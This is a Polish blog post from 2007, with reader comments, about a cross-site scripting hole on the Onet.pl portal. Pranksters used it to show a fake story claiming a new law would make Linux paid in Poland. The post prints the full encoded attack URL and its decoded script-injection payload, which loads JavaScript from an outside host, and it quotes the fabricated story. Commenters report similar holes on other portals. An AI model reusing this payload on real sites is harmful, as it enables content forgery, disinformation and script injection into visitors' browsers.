Cross site scripting i "Linuks już nie darmowy"
Gratuluje poczucia humoru. "Linuks już nie darmowy" - taki tytuł można zobaczyć w layoucie Onet.pl pod adresem, który krąży sobie po różnych komunikatorach, czatach i w inny sposób. Znaleziono kolejny sposób na sianie fermentu, tym razem z wykorzystaniem właściwości największego polskiego portalu. Fajnie. A przecież jest okres przed desygnowaniem na premiera i w tej sferze również wszyscy chętnie uwierzą we wszystko. Środowisko internetowe wciąż jest hermetyczne i dowcipy ma branżowe. Ale kiedyś wypłynie na szerokie wody ogólnospołeczne...
Wikipedia pisze: "Cross-site scripting (XSS) to sposób ataku na serwis WWW polegający na osadzeniu w treści atakowanej strony kodu (zazwyczaj JavaScript), który wyświetlony innym użytkownikom może doprowadzić do wykonania przez nich niepożądanych akcji. Skrypt umieszczony w zaatakowanej stronie może obejść niektóre mechanizmy kontroli dostępu do danych użytkownika". Oczywiście to nie wszystkie zastosowania tego mechanizmu.
Pod sfabrykowanym linkiem, który przekazywany jest różnymi kanałami (http://tnij.org/linux_juz_nie_darmowy), a który w istocie stanowi skrót do nieco dłuższego URL, można przeczytać bełkotliwie napisany tekst, który przywołam w całości (dla celów archiwalnych, bo może przyda się kiedyś edukacyjnie):
W ciągu najbliższych dni Polska stanie się jedynym krajem na świecie w którym użytkowanie systemu operacyjnego Linuks nie będzie darmowe.
Wszystko za sprawą nowej ustawy o ochronie praw autorskich, którą zamierza wprowadzić PiS przed przekazaniem rządów Platformie Obywatelskiej. W myśl ustawy każdy komputer podłączony do internetu musi zostać zarejestrowany w stworzonym na ten cel Krajowym Rejestrze Teleinformatycznym. Jak tłumaczy minister rejestr ten wielokrotnie zwiększy wykrywalność przestępstw internetowych - zwłaszcza nielegalnego ściągania filmów, oprogramowania oraz muzyki.
Rejestracja w systemie ma być darmowa jedynie dla nowo rejestrowanych systemów operacyjnych Windows. Dane użytkownika rejestrującego produkt Microsoftu będą automatycznie przekazywane do KRT. Właściciele komputerów z już zarejestrowanymi systemami oraz ci którzy używaja innych systemów operacyjnych jak min. Linuks czy Mac OS będą musieli wnieść jednorazową opłatę za każdy komputer z dostępem do internetu. Wstępnie cena rejestracji została oszacowana na 47zł.
A tak to wygląda po zrenderowaniu strony i osadzonego tam tekstu z zewnętrznego źródła:
Fałszywa notatka dostępna pod adresem "w domenie" onet.pl (por. poniżej)
Ciekawe ile osób się na to nabierało? Zobaczymy, czy w głównych serwisach powtórzy się sfabrykowana informacja. W każdym razie pokazuje to siłę jaką mogą wykorzystać manipulatorzy.
Tnij.org to serwis, który służy do "skracania" linków. Tak naprawdę serwis tworzy przekierowanie z krótkiego adresu na ten prawdziwy. W tym przypadku prawdziwy (ale w jako hex) adres to:
http://wiadomosci.onet.pl/1635435%27%29%
3b%7d%64%6f%63%75%6d%65%6e%74%2e%77%72%
69%74%65%28%27%3c%73%63%72%69%70%74%20%
73%72%63%3d%22%68%74%74%70%3a%27%2b%53%
74%72%69%6e%67%2e%66%72%6f%6d%43%68%61%
72%43%6f%64%65%28%34%37%29%2b%53%74%72%
69%6e%67%2e%66%72%6f%6d%43%68%61%72%43%
6f%64%65%28%34%37%29%2b%27%6f%6e%2e%68%
6f%6d%65%6c%69%6e%75%78%2e%6f%72%67%27%
2b%53%74%72%69%6e%67%2e%66%72%6f%6d%43%
68%61%72%43%6f%64%65%28%34%37%29%2b%27%
61%2e%6a%73%22%20%27%2b%53%74%72%69%6e%
67%2e%66%72%6f%6d%43%68%61%72%43%6f%64%
65%28%34%37%29%2b%53%74%72%69%6e%67%2b%
27%3e%27%29%3b%66%75%6e%63%74%69%6f%6e%
20%78%28%29%7b%78%28%27,18,item.html
Ten kod (zaczynający się od pierwszego procenta), po konwersji HEX to ASCII, wygląda tak:
');}document.write('<script
src="http:'+String.fromCharCode(47)+String.fromCharCode
(47)+'on.homelinux.org'+String.fromCharCode(47)+
'a.js" '+String.fromCharCode(47)+String+'>');
function x(){x('
Pozdrawiam pomysłodawców i wykonawców. Następnym razem postarajcie się jednak napisać notatkę językiem bardziej wiarygodnym. W Polsce ustawy przyjmowane są przez Parlament. Rząd sam z siebie żadnej ustawy nie może przyjąć. Jeśli cytujecie ministra, to podajcie jego nazwisko i ministerstwo, którym kieruje, etc...
- Login to post comments
Piotr VaGla Waglowski
Piotr VaGla Waglowski - prawnik, publicysta i webmaster, autor serwisu VaGla.pl Prawo i Internet. Ukończył Aplikację Legislacyjną prowadzoną przez Rządowe Centrum Legislacji. Radca ministra w Departamencie Oceny Ryzyka Regulacyjnego a następnie w Departamencie Doskonalenia Regulacji Gospodarczych Ministerstwa Rozwoju. Felietonista miesięcznika "IT w Administracji" (wcześniej również felietonista miesięcznika "Gazeta Bankowa" i tygodnika "Wprost"). Uczestniczył w pracach Obywatelskiego Forum Legislacji, działającego przy Fundacji im. Stefana Batorego w ramach programu Odpowiedzialne Państwo. W 1995 założył pierwszą w internecie listę dyskusyjną na temat prawa w języku polskim, Członek Założyciel Internet Society Poland, pełnił funkcję Członka Zarządu ISOC Polska i Członka Rady Polskiej Izby Informatyki i Telekomunikacji. Był również członkiem Rady ds Cyfryzacji przy Ministrze Cyfryzacji i członkiem Rady Informatyzacji przy MSWiA, członkiem Zespołu ds. otwartych danych i zasobów przy Komitecie Rady Ministrów do spraw Cyfryzacji oraz Doradcą społecznym Prezesa Urzędu Komunikacji Elektronicznej ds. funkcjonowania rynku mediów w szczególności w zakresie neutralności sieci. W latach 2009-2014 Zastępca Przewodniczącego Rady Fundacji Nowoczesna Polska, w tym czasie był również Członkiem Rady Programowej Fundacji Panoptykon. Więcej >>
Fala poszła
Skoro odkryto właściwości onetowego serwisu, to fala dowcipów poszła w Sieć. I tak można już przeczytać np., że "Steve Ballmer podał się do dymisji". Pewnie jeszcze kilka takich rewelacji pojawi się w najbliższym czasie :)
--
[VaGla] Vigilant Android Generated for Logical Assassination
Wiesz tragiczne to nie są
Wiesz tragiczne to nie są takie głupie wygłupy bo może są medialne, ale nie czynią wiele zła.
Tragiczne jest to, że takie podatności ma WIELE innych serwisów, tylko z nich sobie nikt jaj nie robi, a bardziej wykorzystuje to w niecnych celach.
Ja przewiduję, że niedługo wrócimy do klasycznego HTML łupanego, bez żadnych JS, Javy, Flasha ze wszystkimi ich dziurami właśnie z tego powodu.
Ja się boję banków, które np. zmuszają do używania tych technologii. Bo ich nie rozumiem (są bardzo skomplikowane) ale wiem jaki niosą potencjał zagrożeń.
Czas najwyższy
Czas najwyższy żeby się z tą pogonią za nowymi technologiami trochę opamiętać, w momencie kiedy stare doskonale się sprawdzają.
Ja dzisiaj nie mogłem się zalogować na stronie banku, bo... miałem wyłączony JavaScript. Wszystko, co zobaczyłem, to "wpisz swój PIN tutaj" bez żadnego pola do wpisania.
Każdy, kto choć trochę wie o bezpieczeństwie może potwierdzić, że nieprzemyślane zwiększanie skomplikowania systemu nie prowadzi raczej do zwiększenia jego bezpieczeństwa (że już o kosztach utrzymania i łatwości użycia nie wspomnę), a wręcz przeciwnie.
bawie się nagrywarką desktopową
Niestety nagranie nie jest najlepszej jakości, bo trzeba jednak ustawić inne (mniejsze) wymiary nagrywanego obszaru. Po kompresji do flv niewiele widać, ale jeśli się zna treść powyższej notatki, to niech będzie sobie taka ilustracja:
A więc w YouTube umieściłem kolejny filmik, tym razem "edukacyjny" Cross site scripting i "Linuks już nie darmowy", chociaż mało edukacyjny, skoro niewyraźny... Następnym razem będzie lepiej. Mam nadzieję.
--
[VaGla] Vigilant Android Generated for Logical Assassination
Mały offtopic - jakość
Mały offtopic - jakość nie spadła z powodu kompresji do flv, tylko z powodu używania youtube ;) Polecam inne alternatywne serwisy video (np. viddler.com), w których można uploadować filmy nawet w jakości hd bez (az tak) stratnej kompresji.
I jeszcze cenzura
Tu też jest ten motyw "ustawy": "Od 1 stycznia 2008 Polska stanie się drugim po Chinach krajem na świecie z pełną cenzurą Internetu. Za pełen dostęp trzeba będzie słono zapłacić". Ciekawe, że stan zagrożenia siany jest motywem normatywnym, związanym z internetem... Być może ludzie są skłonni uwierzyć w tego typu doniesienia z powodu określonego stanu polskiej dyskusji na temat prawa i nowych technologii? Gdyby ktoś miał wątpliwości - nie mam z tym nic wspólnego:
--
[VaGla] Vigilant Android Generated for Logical Assassination
No i po ptokach
No i onetowcy załatali dziurę. Jak chcą to potrafią. Szkoda tylko, że można było siać zamęt przez ładnych kilkanaście godzin. Teraz może czas na WP ? ;-)
Właśnie zrobiłem to samo
Właśnie zrobiłem to samo na wp.pl :-)
http://tnij.org/linux_juz_nie_darmowy2
kolega jest odważny
kolega jest odważny
Biorąc pod uwagę takie sprawy jak:
Sprawa Precious
Włamanie poprzez wpisanie ' or 1=1
A po otworzeniu widać, że plik js .znajduje się na koncie uczelnianym niejakiego marynicza...
Jak wynika z doświadczenia, po wykryciu luki w zabezpieczeniach najlepiej... pożałować, że się za to zabrało.Nawet, jak żadnych zabezpieczeń nie było...
Wysłałem im informację o
Wysłałem im informację o tej dziurze... I nie wiedziałem że za samo poinformowanie w Polsce można iść do więzienia. Zresztą planowałem posłać im maila...
No i już naprawili... Ale
No i już naprawili... Ale nie podziękowali ...
Wirtualna Polska
I rzeczywiście. Poniżej screenshot fałszywej notatki opublikowanej z wykorzystaniem infrastruktury Wirtualnej Polski. Tu da się kod wkleić za "...wiadomosc.html?kat=5630..."
--
[VaGla] Vigilant Android Generated for Logical Assassination
Na całej akcji najbardziej
Na całej akcji najbardziej straciło tak na prawdę PiS. Parę serwisów linkowało już ten tekst i na forach "wrzawa" - krótka, ale była.
Z pewnością nie do każdego dotarło że to żart, a PiS traci wyborców przez "swój kolejny głupi pomysł".
Parę pytań... Skąd
Parę pytań... Skąd pochodzą komentarze pod fałszywką? Czy tylko komentarz w stylu "to jest fake" jest dostawiony do fałszywki, a reszta to losowo dobrane opinie z innych newsów? A jeżeli nie, to skąd zwykły czytelnik WP (czy Onetu), nie mający nic wspólnego z Vagla.pl trafia na fałszywkę? Czy fałszywy news jest olinkowany gdzieś na stronie głównej portalu?
No i jak się mają zabezpieczenia bazy danych w portalach do zabezpieczeń ich serwerów? Zawsze myślałem, że nawet niedoskonała baza danych jednak nie będzie złamana, jeżeli serwer będzie jako całość chroniony systemowo. Chyba, że Piotr (cytując Wikipedię) nie dość dokładnie opisał mechanizm cross site scriptingu. Czy wywołanie takiego efektu wymaga ingerencji w serwer portalu, czy też wystarczy skrypt wiszący na dowolnym obcym (np. naszym) serwerze czy nawet lokalnym kompie i tylko doklejamy skrypt do oryginalnej części URL? No ale skąd wtedy dostęp do newsa dla zwykłych czytelników? Czyżby tylko przez obce fora z krótkimi linkami?
Prosze przeczytać tekst
W tekście jest wyjaśnione, w jaki sposób skracane linki krążyły po Sieci, jest też opisany mechanizm "wklejania" treści umieszczonych na innych serwerach (za pomocą JavaScript'u). Adres kierował do zasobu portalu (jakiegoś artykułu) i potem zaszyty tam skrypt podmieniał treść tego artykułu na to, co pochodziło ze zdalengo serwera). Komentarze widoczne pod fałszywym tekstem przypisane są do pierwotnego artykułu (czyli tego, który jest podmieniany JavaScriptem na fałszywy).
--
[VaGla] Vigilant Android Generated for Logical Assassination
onet wciąż jest dziurawy
Wygląda na to, że w onecie na szybko załatali dziurę tylko w jednym miejscu. W innych częściach serwisu (biznes.onet.pl) nadal są błędy. Przykład z dodatkowo sfałszowanym pierwszym komentarzem:
http://tnij.org/onet_wciaz_dziurawy
I screenshot na wypadek, gdyby naprawili:
Pozdrawiam,
Dalej dziurawe
Już jest 13.11.2007 i dalej nie poprawili :)
I dalej cisza w kwestji
I dalej cisza w kwestji luki, 24 lis 2007 :P